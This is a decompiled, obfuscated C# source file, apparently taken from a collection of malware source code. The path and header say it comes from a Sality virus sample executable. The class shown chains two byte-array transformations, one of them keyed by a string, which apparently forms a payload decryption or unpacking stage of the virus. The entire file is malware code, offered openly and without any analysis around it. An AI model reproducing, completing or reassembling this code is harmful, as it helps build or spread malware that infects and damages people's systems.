MalwareSourceCode/MSIL/Virus/Win32/S/Virus.Win32.Sality.sil-9eb937e4a3faa7c29e8cc85118a5c87d65f8716c89e5d1b13d7d7bc334ec8975/_0007/_0006.cs

75 lines
2.2 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: a5b7ee8e-cbdf-4eff-9144-efd0c433f3fe, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 97CE9FDF-0921-44CB-AE13-1E9A2A550F0F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.Sality.sil-9eb937e4a3faa7c29e8cc85118a5c87d65f8716c89e5d1b13d7d7bc334ec8975.exe
using \u0006;
using \u0007;
using \u0008;
using SmartAssembly.SmartExceptionsCore;
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0007
{
internal sealed class \u0006 : \u0001
{
[MethodImpl(MethodImplOptions.NoInlining)]
public \u0006()
{
\u0003.\u0003();
// ISSUE: explicit constructor call
base.\u002Ector();
try
{
}
catch (Exception ex)
{
throw UnhandledException.\u0003(ex, (object) this);
}
}
[MethodImpl(MethodImplOptions.NoInlining)]
public override object \u0003([In] object[] obj0)
{
object[] objArray1;
object[] objArray2;
try
{
\u0005.\u0001 = (\u0001) new \u0002();
object[] objArray3 = obj0;
\u0001 obj1 = \u0005.\u0001;
objArray1 = new object[2]
{
(object) (byte[]) obj0[0],
(object) Encoding.Default.GetString((byte[]) obj0[1])
};
object[] objArray4 = objArray1;
byte[] numArray1 = (byte[]) obj1.\u0003(objArray4);
objArray3[0] = (object) numArray1;
\u0005.\u0001 = (\u0001) new \u0003();
object[] objArray5 = obj0;
\u0001 obj2 = \u0005.\u0001;
objArray2 = new object[1]
{
(object) (byte[]) obj0[0]
};
object[] objArray6 = objArray2;
byte[] numArray2 = (byte[]) obj2.\u0003(objArray6);
objArray5[0] = (object) numArray2;
return (object) (byte[]) obj0[0];
}
catch (Exception ex)
{
object[] objArray7 = objArray1;
object[] objArray8 = objArray2;
object[] objArray9 = obj0;
throw UnhandledException.\u0003(ex, (object) objArray7, (object) objArray8, (object) this, (object) objArray9);
}
}
}
}